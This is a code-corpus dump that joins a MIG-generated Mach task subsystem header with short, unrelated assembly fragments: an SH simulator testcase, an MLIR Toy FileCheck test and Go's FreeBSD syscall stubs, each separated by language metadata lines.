#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t semaphore;
/* end of the kernel processed data */
} __Request__semaphore_destroy_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
task_policy_flavor_t flavor;
mach_msg_type_number_t policy_infoCnt;
integer_t policy_info[16];
} __Request__task_policy_set_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
task_policy_flavor_t flavor;
mach_msg_type_number_t policy_infoCnt;
boolean_t get_default;
} __Request__task_policy_get_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t reply;
/* end of the kernel processed data */
} __Request__task_sample_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
policy_t policy;
mach_msg_type_number_t baseCnt;
integer_t base[5];
boolean_t set_limit;
boolean_t change;
} __Request__task_policy_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
vm_address_t routine_entry_pt;
int routine_number;
} __Request__task_set_emulation_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
} __Request__task_get_emulation_vector_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_ool_descriptor_t emulation_vector;
/* end of the kernel processed data */
NDR_record_t NDR;
int vector_start;
mach_msg_type_number_t emulation_vectorCnt;
} __Request__task_set_emulation_vector_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
vm_address_t basepc;
vm_address_t boundspc;
} __Request__task_set_ras_pc_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t new_set;
/* end of the kernel processed data */
NDR_record_t NDR;
boolean_t assign_threads;
} __Request__task_assign_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
boolean_t assign_threads;
} __Request__task_assign_default_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
} __Request__task_get_assignment_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t pset;
/* end of the kernel processed data */
NDR_record_t NDR;
policy_t policy;
mach_msg_type_number_t baseCnt;
integer_t base[5];
mach_msg_type_number_t limitCnt;
integer_t limit[1];
boolean_t change;
} __Request__task_set_policy_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
thread_state_flavor_t flavor;
mach_msg_type_number_t old_stateCnt;
} __Request__task_get_state_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
thread_state_flavor_t flavor;
mach_msg_type_number_t new_stateCnt;
natural_t new_state[144];
} __Request__task_set_state_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#endif /* !__Request__task_subsystem__defined */
/* union of all requests */
#ifndef __RequestUnion__task_subsystem__defined
#define __RequestUnion__task_subsystem__defined
union __RequestUnion__task_subsystem {
__Request__task_create_t Request_task_create;
__Request__task_terminate_t Request_task_terminate;
__Request__task_threads_t Request_task_threads;
__Request__mach_ports_register_t Request_mach_ports_register;
__Request__mach_ports_lookup_t Request_mach_ports_lookup;
__Request__task_info_t Request_task_info;
__Request__task_set_info_t Request_task_set_info;
__Request__task_suspend_t Request_task_suspend;
__Request__task_resume_t Request_task_resume;
__Request__task_get_special_port_t Request_task_get_special_port;
__Request__task_set_special_port_t Request_task_set_special_port;
__Request__thread_create_t Request_thread_create;
__Request__thread_create_running_t Request_thread_create_running;
__Request__task_set_exception_ports_t Request_task_set_exception_ports;
__Request__task_get_exception_ports_t Request_task_get_exception_ports;
__Request__task_swap_exception_ports_t Request_task_swap_exception_ports;
__Request__lock_set_create_t Request_lock_set_create;
__Request__lock_set_destroy_t Request_lock_set_destroy;
__Request__semaphore_create_t Request_semaphore_create;
__Request__semaphore_destroy_t Request_semaphore_destroy;
__Request__task_policy_set_t Request_task_policy_set;
__Request__task_policy_get_t Request_task_policy_get;
__Request__task_sample_t Request_task_sample;
__Request__task_policy_t Request_task_policy;
__Request__task_set_emulation_t Request_task_set_emulation;
__Request__task_get_emulation_vector_t Request_task_get_emulation_vector;
__Request__task_set_emulation_vector_t Request_task_set_emulation_vector;
__Request__task_set_ras_pc_t Request_task_set_ras_pc;
__Request__task_assign_t Request_task_assign;
__Request__task_assign_default_t Request_task_assign_default;
__Request__task_get_assignment_t Request_task_get_assignment;
__Request__task_set_policy_t Request_task_set_policy;
__Request__task_get_state_t Request_task_get_state;
__Request__task_set_state_t Request_task_set_state;
};
#endif /* !__RequestUnion__task_subsystem__defined */
/* typedefs for all replies */
#ifndef __Reply__task_subsystem__defined
#define __Reply__task_subsystem__defined
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t child_task;
/* end of the kernel processed data */
} __Reply__task_create_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_terminate_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_ool_ports_descriptor_t act_list;
/* end of the kernel processed data */
NDR_record_t NDR;
mach_msg_type_number_t act_listCnt;
} __Reply__task_threads_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__mach_ports_register_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_ool_ports_descriptor_t init_port_set;
/* end of the kernel processed data */
NDR_record_t NDR;
mach_msg_type_number_t init_port_setCnt;
} __Reply__mach_ports_lookup_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
mach_msg_type_number_t task_info_outCnt;
integer_t task_info_out[10];
} __Reply__task_info_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_set_info_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_suspend_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_resume_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t special_port;
/* end of the kernel processed data */
} __Reply__task_get_special_port_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_set_special_port_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t child_act;
/* end of the kernel processed data */
} __Reply__thread_create_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t child_act;
/* end of the kernel processed data */
} __Reply__thread_create_running_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_set_exception_ports_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t old_handlers[32];
/* end of the kernel processed data */
NDR_record_t NDR;
mach_msg_type_number_t masksCnt;
exception_mask_t masks[32];
exception_behavior_t old_behaviors[32];
thread_state_flavor_t old_flavors[32];
} __Reply__task_get_exception_ports_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t old_handlerss[32];
/* end of the kernel processed data */
NDR_record_t NDR;
mach_msg_type_number_t masksCnt;
exception_mask_t masks[32];
exception_behavior_t old_behaviors[32];
thread_state_flavor_t old_flavors[32];
} __Reply__task_swap_exception_ports_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t new_lock_set;
/* end of the kernel processed data */
} __Reply__lock_set_create_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__lock_set_destroy_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t semaphore;
/* end of the kernel processed data */
} __Reply__semaphore_create_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__semaphore_destroy_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_policy_set_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
mach_msg_type_number_t policy_infoCnt;
integer_t policy_info[16];
boolean_t get_default;
} __Reply__task_policy_get_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_sample_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_policy_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_set_emulation_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_ool_descriptor_t emulation_vector;
/* end of the kernel processed data */
NDR_record_t NDR;
int vector_start;
mach_msg_type_number_t emulation_vectorCnt;
} __Reply__task_get_emulation_vector_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_set_emulation_vector_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_set_ras_pc_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_assign_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_assign_default_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
/* start of the kernel processed data */
mach_msg_body_t msgh_body;
mach_msg_port_descriptor_t assigned_set;
/* end of the kernel processed data */
} __Reply__task_get_assignment_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_set_policy_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
mach_msg_type_number_t old_stateCnt;
natural_t old_state[144];
} __Reply__task_get_state_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#ifdef __MigPackStructs
#pragma pack(4)
#endif
typedef struct {
mach_msg_header_t Head;
NDR_record_t NDR;
kern_return_t RetCode;
} __Reply__task_set_state_t;
#ifdef __MigPackStructs
#pragma pack()
#endif
#endif /* !__Reply__task_subsystem__defined */
/* union of all replies */
#ifndef __ReplyUnion__task_subsystem__defined
#define __ReplyUnion__task_subsystem__defined
union __ReplyUnion__task_subsystem {
__Reply__task_create_t Reply_task_create;
__Reply__task_terminate_t Reply_task_terminate;
__Reply__task_threads_t Reply_task_threads;
__Reply__mach_ports_register_t Reply_mach_ports_register;
__Reply__mach_ports_lookup_t Reply_mach_ports_lookup;
__Reply__task_info_t Reply_task_info;
__Reply__task_set_info_t Reply_task_set_info;
__Reply__task_suspend_t Reply_task_suspend;
__Reply__task_resume_t Reply_task_resume;
__Reply__task_get_special_port_t Reply_task_get_special_port;
__Reply__task_set_special_port_t Reply_task_set_special_port;
__Reply__thread_create_t Reply_thread_create;
__Reply__thread_create_running_t Reply_thread_create_running;
__Reply__task_set_exception_ports_t Reply_task_set_exception_ports;
__Reply__task_get_exception_ports_t Reply_task_get_exception_ports;
__Reply__task_swap_exception_ports_t Reply_task_swap_exception_ports;
__Reply__lock_set_create_t Reply_lock_set_create;
__Reply__lock_set_destroy_t Reply_lock_set_destroy;
__Reply__semaphore_create_t Reply_semaphore_create;
__Reply__semaphore_destroy_t Reply_semaphore_destroy;
__Reply__task_policy_set_t Reply_task_policy_set;
__Reply__task_policy_get_t Reply_task_policy_get;
__Reply__task_sample_t Reply_task_sample;
__Reply__task_policy_t Reply_task_policy;
__Reply__task_set_emulation_t Reply_task_set_emulation;
__Reply__task_get_emulation_vector_t Reply_task_get_emulation_vector;
__Reply__task_set_emulation_vector_t Reply_task_set_emulation_vector;
__Reply__task_set_ras_pc_t Reply_task_set_ras_pc;
__Reply__task_assign_t Reply_task_assign;
__Reply__task_assign_default_t Reply_task_assign_default;
__Reply__task_get_assignment_t Reply_task_get_assignment;
__Reply__task_set_policy_t Reply_task_set_policy;
__Reply__task_get_state_t Reply_task_get_state;
__Reply__task_set_state_t Reply_task_set_state;
};
#endif /* !__RequestUnion__task_subsystem__defined */
#ifndef subsystem_to_name_map_task
#define subsystem_to_name_map_task \
{ "task_create", 3400 },\
{ "task_terminate", 3401 },\
{ "task_threads", 3402 },\
{ "mach_ports_register", 3403 },\
{ "mach_ports_lookup", 3404 },\
{ "task_info", 3405 },\
{ "task_set_info", 3406 },\
{ "task_suspend", 3407 },\
{ "task_resume", 3408 },\
{ "task_get_special_port", 3409 },\
{ "task_set_special_port", 3410 },\
{ "thread_create", 3411 },\
{ "thread_create_running", 3412 },\
{ "task_set_exception_ports", 3413 },\
{ "task_get_exception_ports", 3414 },\
{ "task_swap_exception_ports", 3415 },\
{ "lock_set_create", 3416 },\
{ "lock_set_destroy", 3417 },\
{ "semaphore_create", 3418 },\
{ "semaphore_destroy", 3419 },\
{ "task_policy_set", 3420 },\
{ "task_policy_get", 3421 },\
{ "task_sample", 3422 },\
{ "task_policy", 3423 },\
{ "task_set_emulation", 3424 },\
{ "task_get_emulation_vector", 3425 },\
{ "task_set_emulation_vector", 3426 },\
{ "task_set_ras_pc", 3427 },\
{ "task_assign", 3429 },\
{ "task_assign_default", 3430 },\
{ "task_get_assignment", 3431 },\
{ "task_set_policy", 3432 },\
{ "task_get_state", 3433 },\
{ "task_set_state", 3434 }
#endif
#ifdef __AfterMigUserHeader
__AfterMigUserHeader
#endif /* __AfterMigUserHeader */
#endif /* _task_user_ */
| {
"language": "Assembly"
} |
# sh testcase for float.ld $frgh, $drf -*- Asm -*-
# mach: all
# as: -isa=shmedia
# ld: -m shelf64
.include "media/testutils.inc"
start
movi 1, r0
fmov.ls r0, fr0
float.ld fr0, dr0
pass
| {
"language": "Assembly"
} |
# RUN: toyc-ch3 %s -emit=mlir -opt 2>&1 | FileCheck %s
def main() {
var a<2,1> = [1, 2];
var b<2,1> = a;
var c<2,1> = b;
print(c);
}
# CHECK-LABEL: func @main()
# CHECK-NEXT: [[VAL_0:%.*]] = toy.constant
# CHECK-SAME: dense<[
# CHECK-SAME: [1.000000e+00], [2.000000e+00]
# CHECK-SAME: ]> : tensor<2x1xf64>
# CHECK-NEXT: toy.print [[VAL_0]] : tensor<2x1xf64>
# CHECK-NEXT: toy.return | {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System call support for AMD64, FreeBSD
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-56
JMP syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-80
JMP syscall·Syscall6(SB)
TEXT ·Syscall9(SB),NOSPLIT,$0-104
JMP syscall·Syscall9(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-56
JMP syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-80
JMP syscall·RawSyscall6(SB)
| {
"language": "Assembly"
} |